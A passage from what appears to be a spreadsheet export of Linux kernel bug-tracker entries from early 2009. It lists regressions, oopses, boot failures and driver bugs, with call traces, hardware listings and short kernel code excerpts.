    <t>Subject : 2.6.29-rc2 dies on startup Submitter : Ferenc Wagner &lt;wferi@niif.hu&gt; Date : 2009-01-19 12:53 References : http://marc.info/?l=linux-kernel&amp;m=123236969321703&amp;w=4 This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>WARNING: at drivers/dma/dmaengine.c:352</t>
  </si>
  <si>
    <t>2009-01-19 15:31 UTC</t>
  </si>
  <si>
    <t>2009-02-04 17:12 UTC</t>
  </si>
  <si>
    <t>Subject : Re: WARNING: at drivers/dma/dmaengine.c:352 dma_issue_pending_all+0x77/0x15d() Submitter : Ingo Molnar &lt;mingo@elte.hu&gt; Date : 2009-01-19 21:31 References : http://marc.info/?l=linux-kernel&amp;m=123240070614443&amp;w=4 Handled-By : Dan Williams &lt;dan.j.williams@intel.com&gt; This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>possible circular locking #0:  (sk_lock-AF_PACKET){--..}, at: [&lt;c1279838&gt;] sock_setsockopt+0x12b/0x4a4</t>
  </si>
  <si>
    <t>2.6.29-rc1-git4</t>
  </si>
  <si>
    <t>2009-01-20 10:16 UTC</t>
  </si>
  <si>
    <t>2009-02-01 02:05 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Earliest failing kernel version: Distribution: Gentoo Linux Hardware Environment: ASUS L3C/S laptop Software Environment: Problem Description: Steps to reproduce: I have been reinstalling some apps while started tcpdump. It immediately hit the bug.</t>
  </si>
  <si>
    <t>BUG: using smp_processor_id() in preemptible [00000000] code:  dellWirelessCtl/...</t>
  </si>
  <si>
    <t>v2.6.28-5716-gfe0bdec (also happens with v2.6.29-rc2)</t>
  </si>
  <si>
    <t>2009-01-21 14:21 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: v2.6.28 Earliest failing kernel version: v2.6.28-5716-gfe0bdec (maybe earlier) Distribution: Ubuntu Hardware Environment: Dell XPS M1330 Software Environment: dcdbas? Problem Description: I see this often (all the time) with v2.6.28-5716-gfe0bdec. It is a Dell XPS M1330 (iwl3945, the newer, "...-2" firmware). Jan 5 19:49:36 blimp kernel: BUG: using smp_processor_id() in preemptible [00000000] code: dellWirelessCtl/14180 Jan 5 19:49:36 blimp kernel: caller is smi_request+0x89/0xc8 Jan 5 19:49:36 blimp kernel: Pid: 14180, comm: dellWirelessCtl Not tainted 2.6.28-t #146 Jan 5 19:49:36 blimp kernel: Call Trace: Jan 5 19:49:36 blimp kernel: [&lt;ffffffff8033ee83&gt;] debug_smp_processor_id+0xdb/0xf0 Jan 5 19:49:36 blimp kernel: [&lt;ffffffff8046a6d8&gt;] smi_request+0x89/0xc8 Jan 5 19:49:36 blimp kernel: [&lt;ffffffff8046a78e&gt;] smi_request_store+0x77/0xa5 Jan 5 19:49:36 blimp kernel: [&lt;ffffffff803c69cb&gt;] dev_attr_store+0x1e/0x20 Jan 5 19:49:36 blimp kernel: [&lt;ffffffff802e66e8&gt;] sysfs_write_file+0xe4/0x119 Jan 5 19:49:36 blimp kernel: [&lt;ffffffff802a0084&gt;] vfs_write+0xae/0x124 Jan 5 19:49:36 blimp kernel: [&lt;ffffffff802a01be&gt;] sys_write+0x47/0x70 Jan 5 19:49:36 blimp kernel: [&lt;ffffffff8020b69b&gt;] system_call_fastpath+0x16/0x1b The function smi_request: /** * smi_request: generate SMI request * * Called with smi_data_lock. */ static int smi_request(struct smi_cmd *smi_cmd) { cpumask_t old_mask; int ret = 0; if (smi_cmd-&gt;magic != SMI_CMD_MAGIC) { dev_info(&amp;dcdbas_pdev-&gt;dev, "%s: invalid magic value\n", __func__); return -EBADR; } /* SMI requires CPU 0 */ old_mask = current-&gt;cpus_allowed; set_cpus_allowed_ptr(current, &amp;cpumask_of_cpu(0)); if (smp_processor_id() != 0) { &lt;==== here? dev_dbg(&amp;dcdbas_pdev-&gt;dev, "%s: failed to get CPU 0\n", __func__); ret = -EBUSY; goto out; } /* generate SMI */ asm volatile ( "outb %b0,%w1" : /* no output args */ : "a" (smi_cmd-&gt;command_code), "d" (smi_cmd-&gt;command_address), "b" (smi_cmd-&gt;ebx), "c" (smi_cmd-&gt;ecx) : "memory" ); out: set_cpus_allowed_ptr(current, &amp;old_mask); return ret; } As the problem points at dcdbas driver, it was also reported to Dell's Doug Warzecha &lt;Douglas_Warzecha@dell.com&gt;. No answer yet</t>
  </si>
  <si>
    <t>Cannot boot 2.6.28 under Dell OptiPlex 960</t>
  </si>
  <si>
    <t>2.6.28.1</t>
  </si>
  <si>
    <t>2009-01-22 04:37 UTC</t>
  </si>
  <si>
    <t>Denis Scherbakov</t>
  </si>
  <si>
    <t>2009-02-04 15:52 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.27.x Earliest failing kernel version: 2.6.28-rc8, 2.6.28-rc9, 2.6.28, 2.6.28.1 Distribution: Gentoo Linux, but clean 2.6.28 from kernel.org also tested. Hardware Environment: Dell OptiPlex 960, Intel Core 2 Quad Q9550 Software Environment: Grub Boot Loader Problem Description: I cannot boot into 2.6.28.x kernels. It stucks right after the beginning: =================== Booting 'Gentoo Linux Devel' kernel /boot/vmlinuz-2.6.28-gentoo-r1 root=/dev/sda3 [Linux-bzImage, setup=0x2a00, size=0x293070] Decompressing Linux... Parsing ELF... done. Booting the kernel. =================== After that keyboard stops working and I have to do hard poweroff. I tried to boot the kernel in question under qemu. It boots there. =================== lspci -nn 00:00.0 Host bridge [0600]: Intel Corporation Device [8086:2e10] (rev 03) 00:01.0 PCI bridge [0604]: Intel Corporation Device [8086:2e11] (rev 03) 00:02.0 VGA compatible controller [0300]: Intel Corporation Device [8086:2e12] (rev 03) 00:02.1 Display controller [0380]: Intel Corporation Device [8086:2e13] (rev 03) 00:03.0 Communication controller [0780]: Intel Corporation Device [8086:2e14] (rev 03) 00:03.2 IDE interface [0101]: Intel Corporation Device [8086:2e16] (rev 03) 00:03.3 Serial controller [0700]: Intel Corporation Device [8086:2e17] (rev 03) 00:19.0 Ethernet controller [0200]: Intel Corporation Device [8086:10de] (rev 02) 00:1a.0 USB Controller [0c03]: Intel Corporation Device [8086:3a67] (rev 02) 00:1a.1 USB Controller [0c03]: Intel Corporation Device [8086:3a68] (rev 02) 00:1a.2 USB Controller [0c03]: Intel Corporation Device [8086:3a69] (rev 02) 00:1a.7 USB Controller [0c03]: Intel Corporation Device [8086:3a6c] (rev 02) 00:1b.0 Audio device [0403]: Intel Corporation Device [8086:3a6e] (rev 02) 00:1c.0 PCI bridge [0604]: Intel Corporation Device [8086:3a70] (rev 02) 00:1c.1 PCI bridge [0604]: Intel Corporation Device [8086:3a72] (rev 02) 00:1d.0 USB Controller [0c03]: Intel Corporation Device [8086:3a64] (rev 02) 00:1d.1 USB Controller [0c03]: Intel Corporation Device [8086:3a65] (rev 02) 00:1d.2 USB Controller [0c03]: Intel Corporation Device [8086:3a66] (rev 02) 00:1d.7 USB Controller [0c03]: Intel Corporation Device [8086:3a6a] (rev 02) 00:1e.0 PCI bridge [0604]: Intel Corporation 82801 PCI Bridge [8086:244e] (rev a2) 00:1f.0 ISA bridge [0601]: Intel Corporation Device [8086:3a14] (rev 02) 00:1f.2 RAID bus controller [0104]: Intel Corporation 82801 SATA RAID Controller [8086:2822] (rev 02) 00:1f.3 SMBus [0c05]: Intel Corporation Device [8086:3a60] (rev 02) =================== Steps to reproduce: Not sure. I think it is possible only on optiplex 960 hardware.</t>
  </si>
  <si>
    <t>A flavour of Intel HD audio not implemented?</t>
  </si>
  <si>
    <t>2.6.27.7 (or 2.6.28.1)</t>
  </si>
  <si>
    <t>2009-01-23 05:53 UTC</t>
  </si>
  <si>
    <t>2009-03-20 06:22 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: probably none Earliest failing kernel version: unknown Distribution: Slackware 12.2, mainline kernel Hardware Environment: Toshiba Satellite L300-1AQ Software Environment: KDE-3.9.10 Problem Description: Sound works, volume change too, but: 1) There is only the Master slider in alsamixer after reboot; once KDE is up, I manage to get two sliders: Master and PCM. This means many channels are not available -- among them the microphone, which I need 2) Plugging in external speakers or headphones: laptop speakers do not disengage 3) None of the available snd-hada-intel implementations in the kernel affect the situation relevant lspci -vv: ------------------- 00:1b.0 Audio device: Intel Corporation 82801I (ICH9 Family) HD Audio Controller (rev 03) Subsystem: Toshiba America Info Systems Unknown device ff66 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 22 Region 0: Memory at 96700000 (64-bit, non-prefetchable) [size=16K] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=55mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [60] Message Signalled Interrupts: Mask- 64bit+ Queue=0/0 Enable- Address: 0000000000000000 Data: 0000 Capabilities: [70] Express (v1) Root Complex Integrated Endpoint, MSI 00 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s &lt;64ns, L1 &lt;1us ExtTag- RBE- FLReset+ DevCtl: Report errors: Correctable- Non-Fatal- Fatal- Unsupported- RlxdOrd- ExtTag- PhantFunc- AuxPwr- NoSnoop- MaxPayload 128 bytes, MaxReadReq 128 bytes DevSta: CorrErr- UncorrErr- FatalErr- UnsuppReq- AuxPwr+ TransPend- LnkCap: Port #0, Speed unknown, Width x0, ASPM unknown, Latency L0 &lt;64ns, L1 &lt;1us ClockPM- Suprise- LLActRep- BwNot- LnkCtl: ASPM Disabled; Disabled- Retrain- CommClk- ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt- LnkSta: Speed unknown, Width x0, TrErr- Train- SlotClk- DLActive- BWMgmt- ABWMgmt- Capabilities: [100] Virtual Channel &lt;?&gt; Capabilities: [130] Root Complex Link &lt;?&gt; Kernel driver in use: HDA Intel Kernel modules: snd-hda-intel relevant dmesg | grep Intel: ---------------------------- HDA Intel 0000:00:1b.0: PCI INT A -&gt; GSI 22 (level, low) -&gt; IRQ 22 HDA Intel 0000:00:1b.0: setting latency timer to 64 Steps to reproduce: n/a, always present</t>
  </si>
  <si>
    <t>oops when plugging in AC</t>
  </si>
  <si>
    <t>2.6.29-rc2-wl-dirty</t>
  </si>
  <si>
    <t>2009-01-24 07:04 UTC</t>
  </si>
  <si>
    <t>2009-01-29 11:47 UTC</t>
  </si>
  <si>
    <t>Seems like a race condition, I'm sure I've plugged in AC before at runtime without this happening... [ 3820.603439] BUG: unable to handle kernel paging request at ffffffff805b375f [ 3820.603448] IP: [&lt;ffffffff803f720b&gt;] memcpy_c+0xb/0x20 [ 3820.603457] PGD 203067 PUD 207063 PMD 7c822161 PTE 5b3161 [ 3820.603465] Oops: 0003 [#1] PREEMPT SMP [ 3820.603472] last sysfs file: /sys/devices/LNXSYSTM:00/device:00/PNP0C0A:00/power_supply/BAT0/energy_full [ 3820.603476] CPU 1 [ 3820.603479] Modules linked in: zd1211rw sha256_generic af_packet binfmt_misc rfcomm l2cap kvm_intel kvm acpi_cpufreq cpufreq_userspace cpufreq_powersave fuse loop btusb bluetooth bcm5974 snd_hda_codec_realtek hid_apple usbhid arc4 snd_hda_intel snd_hda_codec snd_hwdep snd_pcm_oss snd_mixer_oss snd_pcm uvcvideo b43 videodev v4l1_compat v4l2_compat_ioctl32 snd_seq_oss rfkill snd_seq_midi_event mac80211 snd_seq joydev cfg80211 snd_timer applesmc snd_seq_device hwmon sg input_polldev mbp_nvidia_bl ehci_hcd ohci_hcd sr_mod backlight ssb snd cdrom soundcore snd_page_alloc usbcore evdev sd_mod unix [ 3820.603555] Pid: 89, comm: kacpi_notify Not tainted 2.6.29-rc2-wl-dirty #20 [ 3820.603559] RIP: 0010:[&lt;ffffffff803f720b&gt;] [&lt;ffffffff803f720b&gt;] memcpy_c+0xb/0x20 [ 3820.603564] RSP: 0018:ffff88007d8c3bc8 EFLAGS: 00010246 [ 3820.603567] RAX: ffffffff805b375f RBX: ffff880001aa0340 RCX: 0000000000000001 [ 3820.603570] RDX: 0000000000000000 RSI: ffffffff805cc600 RDI: ffffffff805b375f [ 3820.603573] RBP: ffff88007d8c3c10 R08: 0000000000000000 R09: 0000000000000000 [ 3820.603575] R10: 0000000000000000 R11: 0000000000000000 R12: ffffffff81013038 [ 3820.603578] R13: ffffffff805cc600 R14: ffffffff8042dacf R15: ffff88007d84c670 [ 3820.603581] FS: 0000000000000000(0000) GS:ffff88007de69190(0000) knlGS:0000000000000000 [ 3820.603584] CS: 0010 DS: 0018 ES: 0018 CR0: 000000008005003b [ 3820.603587] CR2: ffffffff805b375f CR3: 0000000000201000 CR4: 00000000000026e0 [ 3820.603590] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 3820.603593] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 [ 3820.603597] Process kacpi_notify (pid: 89, threadinfo ffff88007d8c2000, task ffff88007d8ba450) [ 3820.603600] Stack: [ 3820.603602] ffffffffa0f2636c ffff880000000001 ffffffff805b375f ffffffff00000198 [ 3820.603609] ffffffff805b4aa2 ffffffff8100f820 0000000000185a60 ffff88007da6a9c0 [ 3820.603617] 0000000000000000 ffff88007d8c3c30 ffffffffa0f26406 ffff88007d8c3c40 [ 3820.603625] Call Trace: [ 3820.603627] [&lt;ffffffffa0f2636c&gt;] ? get_cur_val+0xcc/0x100 [acpi_cpufreq] [ 3820.603635] [&lt;ffffffff805b375f&gt;] ? down_write+0x6f/0x80 [ 3820.603642] [&lt;ffffffff805b4aa2&gt;] ? _spin_unlock_irqrestore+0x42/0x80 [ 3820.603648] [&lt;ffffffffa0f26406&gt;] get_cur_freq_on_cpu+0x66/0x90 [acpi_cpufreq] [ 3820.603653] [&lt;ffffffff804d47b8&gt;] cpufreq_update_policy+0xa8/0x110 [ 3820.603660] [&lt;ffffffff804d4820&gt;] ? handle_update+0x0/0x10 [ 3820.603666] [&lt;ffffffff80446e8d&gt;] ? acpi_ut_release_mutex+0x5d/0x61 [ 3820.603672] [&lt;ffffffff804542a5&gt;] acpi_processor_ppc_has_changed+0x85/0x8c [ 3820.603678] [&lt;ffffffff804485f6&gt;] ? acpi_bus_get_device+0x25/0x39 [ 3820.603683] [&lt;ffffffff80450543&gt;] acpi_processor_notify+0x57/0xc9 [ 3820.603688] [&lt;ffffffff80433fe8&gt;] acpi_ev_notify_dispatch+0x5f/0x6b [ 3820.603694] [&lt;ffffffff8042dafb&gt;] acpi_os_execute_deferred+0x2c/0x39 [ 3820.603699] [&lt;ffffffff8042dacf&gt;] ? acpi_os_execute_deferred+0x0/0x39 [ 3820.603704] [&lt;ffffffff8025a735&gt;] run_workqueue+0x105/0x250 [ 3820.603711] [&lt;ffffffff8025a6e3&gt;] ? run_workqueue+0xb3/0x250 [ 3820.603715] [&lt;ffffffff8025a92f&gt;] worker_thread+0xaf/0x130 [ 3820.603720] [&lt;ffffffff8025f480&gt;] ? autoremove_wake_function+0x0/0x40 [ 3820.603726] [&lt;ffffffff8025a880&gt;] ? worker_thread+0x0/0x130 [ 3820.603730] [&lt;ffffffff8025efb9&gt;] kthread+0x49/0x90 [ 3820.603735] [&lt;ffffffff8020cdba&gt;] child_rip+0xa/0x20 [ 3820.603740] [&lt;ffffffff8020c780&gt;] ? restore_args+0x0/0x30 [ 3820.603745] [&lt;ffffffff8025ef70&gt;] ? kthread+0x0/0x90 [ 3820.603749] [&lt;ffffffff8020cdb0&gt;] ? child_rip+0x0/0x20 [ 3820.603753] Code: 81 ea d8 1f 00 00 48 3b 42 20 73 07 48 8b 50 f9 31 c0 c3 31 d2 48 c7 c0 f2 ff ff ff c3 90 90 90 48 89 f8 89 d1 c1 e9 03 83 e2 07 &lt;f3&gt; 48 a5 89 d1 f3 a4 c3 66 66 66 66 2e 0f 1f 84 00 00 00 00 00 [ 3820.603823] RIP [&lt;ffffffff803f720b&gt;] memcpy_c+0xb/0x20 [ 3820.603828] RSP &lt;ffff88007d8c3bc8&gt; [ 3820.603830] CR2: ffffffff805b375f [ 3820.603834] ---[ end trace d64c84938314fbbc ]---</t>
  </si>
  <si>
    <t>drivers/net/netxen/netxen_nic_init.c:951: Memory leak: buf</t>
  </si>
  <si>
    <t>2009-01-25 03:06 UTC</t>
  </si>
  <si>
    <t>2009-01-30 02:28 UTC</t>
  </si>
  <si>
    <t>In the function netxen_pinit_from_rom there is this code... buf = kcalloc(n, sizeof(struct crb_addr_pair), GFP_KERNEL); if (buf == NULL) { printk("%s: netxen_pinit_from_rom: Unable to calloc memory.\n", netxen_nic_driver_name); return -ENOMEM; } for (i = 0; i &lt; n; i++) { if (netxen_rom_fast_read(adapter, 8*i + 4*offset, &amp;val) != 0 || netxen_rom_fast_read(adapter, 8*i + 4*offset + 4, &amp;addr) != 0) return -EIO; There should be a kfree of buf before the "return -EIO". This bug was found with cppcheck - http://cppcheck.wiki.sourceforge.net/</t>
  </si>
  <si>
    <t>xfs_fsr fails on 2.6.29-rc kernels</t>
  </si>
  <si>
    <t>2009-01-25 13:02 UTC</t>
  </si>
  <si>
    <t>2009-02-08 13:13 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.28-rc9 Earliest failing kernel version: 2.6.29-rc1 Distribution: Debian Hardware Environment: IBM Thinkpad T42 Software Environment: Problem Description: xfs_fsr -v fails with: XFS_IOC_SWAPEXT failed: ino=XXXXXXX: Invalid argument Steps to reproduce: Run xfs_fsr on a moderately fragmented filesystem. Have git-bisected this to the following patch: commit 743bb4650da9e2595d6cedd01c680b5b9398c74a Author: sandeen@sandeen.net &lt;sandeen@sandeen.net&gt; Date: Tue Nov 25 21:20:06 2008 -0600 [XFS] Move copy_from_user calls out of ioctl helpers into ioctl switch. Moving the copy_from_user out of some of the ioctl helpers will make it easier for the compat ioctl switch to copy in the right struct, then just pass to the underlying helper. Also, move common access checks into the helpers themselves, and out of the native ioctl switch code, to reduce code duplication between native &amp; compat ioctl callers. Signed-off-by: Eric Sandeen &lt;sandeen@sandeen.net&gt; Reviewed-by: Christoph Hellwig &lt;hch@lst.de&gt; Signed-off-by: Lachlan McIlroy &lt;lachlan@sgi.com&gt;</t>
  </si>
  <si>
    <t>[PATCH] Fix a panic with 1M of shared memory, no GTT entries</t>
  </si>
  <si>
    <t>2009-01-25 13:04 UTC</t>
  </si>
  <si>
    <t>Lubomir Rintel</t>
  </si>
  <si>
    <t>2010-07-24 09:32 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: not known Earliest failing kernel version: 2.6.18 Distribution: Fedora Hardware Environment: 82G33/G31 Graphics adapter, integrated on MS-7383 board Software Environment: RHEL 5 Problem Description: Page fault, panic Steps to reproduce: Set shared video memory size to 1M in BIOS Setup, boot stock el5 kernel (which has agp-intel compiled in). See original bug report for more details: https://bugzilla.redhat.com/show_bug.cgi?id=445592</t>
  </si>
  <si>
    <t>Sata controller unrecognised on a Packard Bell Imedia 8783</t>
  </si>
  <si>
    <t>2009-01-26 07:22 UTC</t>
  </si>
  <si>
    <t>Nicolas Derive</t>
  </si>
  <si>
    <t>2012-05-30 11:58 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Any known. Earliest failing kernel version: 2.6.27-11-generic Distribution: Ubuntu Hardware Environment: I've an Imedia 8783, with a athlon 64 x2 4400+, a Canberra motherboard from them : Name : Canberra Type : Micro ATX motherboard Made by : ECS (09-04-2008) CPU Support * Socket AM2+/AM2 (AMD 940-pin) * Support socket AM2+/AM2 for AMD Phenom, Athlon 64 X2, Athlon 64, and Sempron processors * Support HyperTransport 3.0 with backward compatibility to HyperTransport 1.0 Chipset * NVIDIA GeForce 8200 mGPU (MCP78) System Memory * 4x 240-pin DDR2 SDRAM DIMM slots * Support Dual channel configuration for better performance * Support for single-sided or double-sided DIMMs (DDR2 533/DDR2 677/DDR2 800/DDR2 1066) * Support for up to 8 GB system memory * Around 700 MB upper memory is shared with the system when 4 GB RAM is installed Video * Maximum video memory in BIOS is 256 MB shared * Total maximum video memory 1407 MB using HyperMemory Audio * Realtek ALC 888 audio codec * High Definition Audio subsystem * 7.1 channel support Network * Realtek RTL8101E * 10/100 Mbit Expansion Slots * 1x PCI Express 16X * 1x PCI Express 1X * 2x PCI Drive Support * 4x SATA II Software Environment: Problem Description: Can't boot using a live cd, can boot using a bootable usb key, but no sata peripheral recognised, like the hard drive, the dvd drive (unlike usb ones which are)... Steps to reproduce: just try to boot... Already reported at Launchpad : https://bugs.edge.launchpad.net/ubuntu/+source/linux-meta/+bug/304505, please read here for more details and especially output files like dmesg, kernel.log...</t>
  </si>
  <si>
    <t>vmalloc_fault handling in x86_64</t>
  </si>
  <si>
    <t>2009-01-26 19:08 UTC</t>
  </si>
  <si>
    <t>Ajith Kumar B</t>
  </si>
  <si>
    <t>2009-03-20 06:04 UTC</t>
  </si>
  <si>
    <t>I was going through the vmalloc fault handling for x86_64 and am unclear about the following lines in the vmalloc_fault() function. pgd = pgd_offset(current-&gt;mm ?: &amp;init_mm, address); pgd_ref = pgd_offset_k(address); Here the intention is to get the pgd corresponding to the current process and sync it up with the pgd in init_mm(obtained from pgd_offset_k). However, for kernel threads current-&gt;mm is NULL and hence pgd = pgd_offset(init_mm, address) = pgd_ref which means the fault handler returns without setting the pgd entry in the MM structure in the context of which the kernel thread has faulted. This could lead to never-ending faults and busy looping of kernel threads like pdflush. So, shouldn't the pgd = pgd_offset(current-&gt;mm ?: &amp;init_mm, address); be pgd = pgd_offset(current-&gt;active_mm ?: &amp;init_mm, address);</t>
  </si>
  <si>
    <t>vde_user.c does not compile</t>
  </si>
  <si>
    <t>2009-01-26 23:01 UTC</t>
  </si>
  <si>
    <t>Ben Smith</t>
  </si>
  <si>
    <t>Problem Description: When building an i386 UML kernel with CONFIG_UML_NET_VDE=y, I get: arch/um/drivers/vde_user.c: In function ‘vde_init_libstuff’: arch/um/drivers/vde_user.c:81: error: implicit declaration of function ‘kmalloc’ arch/um/drivers/vde_user.c:81: warning: assignment makes pointer from integer without a cast I'm using gcc 4.3.2 and the make command is: make ARCH=um SUBARCH=i386</t>
  </si>
  <si>
    <t>[TRIVIAL] MTTR OOPS</t>
  </si>
  <si>
    <t>2.6.32.X</t>
  </si>
  <si>
    <t>2009-01-28 01:13 UTC</t>
  </si>
  <si>
    <t>2011-02-01 22:44 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.27 Earliest failing kernel version: none Distribution: Debian testing Hardware Environment: IBM x3650 server Software Environment: Debian testing, vanilla 2.6.28.2 Problem Description: Linux version 2.6.28.2 (root@sswing) (gcc version 4.3.2 (Debian 4.3.2-1.1) ) #2 SMP PREEMPT Tue Jan 27 10: 09:45 CET 2009 Command line: auto BOOT_IMAGE=linux ro root=801 KERNEL supported cpus: Intel GenuineIntel AMD AuthenticAMD Centaur CentaurHauls BIOS-provided physical RAM map: BIOS-e820: 0000000000000000 - 000000000009a000 (usable) BIOS-e820: 000000000009a000 - 00000000000a0000 (reserved) BIOS-e820: 00000000000e0000 - 0000000000100000 (reserved) BIOS-e820: 0000000000100000 - 00000000bffcb440 (usable) BIOS-e820: 00000000bffcb440 - 00000000bffceac0 (ACPI data) BIOS-e820: 00000000bffceac0 - 00000000c0000000 (reserved) BIOS-e820: 00000000e0000000 - 00000000f0000000 (reserved) BIOS-e820: 00000000fec00000 - 0000000100000000 (reserved) BIOS-e820: 0000000100000000 - 00000006c0000000 (usable) DMI 2.4 present. last_pfn = 0x6c0000 max_arch_pfn = 0x3ffffffff x86 PAT enabled: cpu 0, old 0x7040600070406, new 0x7010600070106 ------------[ cut here ]------------ WARNING: at arch/x86/kernel/cpu/mtrr/generic.c:404 generic_get_mtrr+0xc3/0xfd() mtrr: your BIOS has set up an incorrect mask, fixing it up. Modules linked in: Pid: 0, comm: swapper Not tainted 2.6.28 #2 Call Trace: [&lt;ffffffff80233ba6&gt;] warn_slowpath+0xb4/0xda [&lt;ffffffff80648140&gt;] early_idt_handler+0x0/0x71 [&lt;ffffffff804c0e9f&gt;] printk+0x4e/0x57 [&lt;ffffffff802207fe&gt;] default_spin_lock_flags+0x6/0x8 [&lt;ffffffff804c2a37&gt;] _spin_lock_irqsave+0x34/0x3b [&lt;ffffffff80217a8c&gt;] get_fixed_ranges+0x77/0xa2 [&lt;ffffffff802342ad&gt;] release_console_sem+0x189/0x1bb [&lt;ffffffff80217d25&gt;] mtrr_wrmsr+0x1b/0x48 [&lt;ffffffff80217d25&gt;] mtrr_wrmsr+0x1b/0x48 [&lt;ffffffff8065322f&gt;] get_mtrr_state+0x2e5/0x2f1 [&lt;ffffffff80217c1a&gt;] generic_get_mtrr+0xc3/0xfd [&lt;ffffffff80652097&gt;] mtrr_bp_init+0x1f5/0xc39 [&lt;ffffffff80652b6e&gt;] mtrr_trim_uncached_memory+0x93/0x374 [&lt;ffffffff8065b528&gt;] early_gart_iommu_check+0x9b/0x287 [&lt;ffffffff80648140&gt;] early_idt_handler+0x0/0x71 [&lt;ffffffff8064e79a&gt;] setup_arch+0x424/0x7bd [&lt;ffffffff80648140&gt;] early_idt_handler+0x0/0x71 [&lt;ffffffff80648935&gt;] start_kernel+0x76/0x35f [&lt;ffffffff80648140&gt;] early_idt_handler+0x0/0x71 [&lt;ffffffff806483a1&gt;] x86_64_start_kernel+0xe7/0xf4 ---[ end trace 4eaa2a86a8e2da22 ]--- last_pfn = 0xbffcb max_arch_pfn = 0x3ffffffff Scanning 2 areas for low memory corruption modified physical RAM map: modified: 0000000000000000 - 0000000000001000 (usable) modified: 0000000000001000 - 0000000000006000 (reserved) modified: 0000000000006000 - 0000000000008000 (usable) modified: 0000000000008000 - 0000000000010000 (reserved) modified: 0000000000010000 - 000000000008d000 (usable) modified: 000000000009a000 - 00000000000a0000 (reserved) modified: 00000000000e0000 - 0000000000100000 (reserved) modified: 0000000000100000 - 00000000bffcb440 (usable) modified: 00000000bffcb440 - 00000000bffceac0 (ACPI data) modified: 00000000bffceac0 - 00000000c0000000 (reserved) modified: 00000000e0000000 - 00000000f0000000 (reserved) modified: 00000000fec00000 - 0000000100000000 (reserved) modified: 0000000100000000 - 00000006c0000000 (usable) init_memory_mapping: 0000000000000000-00000000bffcb000 0000000000 - 00bfe00000 page 2M 00bfe00000 - 00bffcb000 page 4k kernel direct mapping tables up to bffcb000 @ 10000-15000 last_map_addr: bffcb000 end: bffcb000 init_memory_mapping: 0000000100000000-00000006c0000000 0100000000 - 06c0000000 page 2M kernel direct mapping tables up to 6c0000000 @ 13000-2f000 last_map_addr: 6c0000000 end: 6c0000000 ACPI: RSDP 000FDFD0, 0024 (r2 IBM ) ACPI: XSDT BFFCE9C0, 004C (r1 IBM SERVALNT 1000 IBM 45444F43) ACPI: FACP BFFCE900, 0084 (r2 IBM SERVALNT 1000 IBM 45444F43) ACPI: DSDT BFFCB440, 26AD (r2 IBM SERVALNT 1000 INTL 20041203) ACPI: FACS BFFCE640, 0040 ACPI: APIC BFFCE840, 0084 (r1 IBM SERVALNT 1000 IBM 45444F43) ACPI: SRAT BFFCE700, 00E8 (r1 IBM SERVALNT 1000 IBM 45444F43) ACPI: HPET BFFCE6C0, 0038 (r1 IBM SERVALNT 1000 IBM 45444F43) ACPI: MCFG BFFCE680, 003C (r1 IBM SERVALNT 1000 IBM 45444F43) ACPI: Local APIC address 0xfee00000 (6 early reservations) ==&gt; bootmem [0000000000 - 06c0000000] #0 [0000000000 - 0000001000] BIOS data page ==&gt; [0000000000 - 0000001000] #1 [0000006000 - 0000008000] TRAMPOLINE ==&gt; [0000006000 - 0000008000] #2 [0000200000 - 000070ef94] TEXT DATA BSS ==&gt; [0000200000 - 000070ef94] #3 [000009a000 - 0000100000] BIOS reserved ==&gt; [000009a000 - 0000100000] #4 [0000010000 - 0000013000] PGTABLE ==&gt; [0000010000 - 0000013000] #5 [0000013000 - 000002a000] PGTABLE ==&gt; [0000013000 - 000002a000] found SMP MP-table at [ffff88000009a140] 0009a140 [ffffe20000000000-ffffe200179fffff] PMD -&gt; [ffff880028200000-ffff88003fbfffff] on node 0 Zone PFN ranges: DMA 0x00000000 -&gt; 0x00001000 DMA32 0x00001000 -&gt; 0x00100000 Normal 0x00100000 -&gt; 0x006c0000 Movable zone start PFN for each node early_node_map[5] active PFN ranges 0: 0x00000000 -&gt; 0x00000001 0: 0x00000006 -&gt; 0x00000008 Steps to reproduce: BOOT kernel</t>
  </si>
  <si>
    <t>crash in hp_wmi_bios_setup (hp-wmi driver)</t>
  </si>
  <si>
    <t>2009-01-28 04:54 UTC</t>
  </si>
  <si>
    <t>2009-03-19 05:31 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: ? Earliest failing kernel version: 2.6.29-rc? Distribution: Fedora 10 Hardware Environment: HP NC6000 Laptop Problem Description: 2.6.29-rc2 crashes at bootup when CONFIG_HP_WMI=y (hp-wmi driver) Steps to reproduce: compile / boot kernel</t>
  </si>
  <si>
    <t>2.6.28.2</t>
  </si>
  <si>
    <t>The rtl-8187b card stops responding and connection is lost on hight trafic (torrent protocol).</t>
  </si>
  <si>
    <t>2009-01-28 14:06 UTC</t>
  </si>
  <si>
    <t>Alexander Kaltsas</t>
  </si>
  <si>
    <t>2009-08-06 00:07 UTC</t>
  </si>
  <si>
    <t>The rtl8187 module driver doesn't work properly on hight traffic. When foe example I am downloading torrents the card doesn't respond an the connection is lost. I have to unload and load the module again. I only happens with me when the torrents are on.</t>
  </si>
  <si>
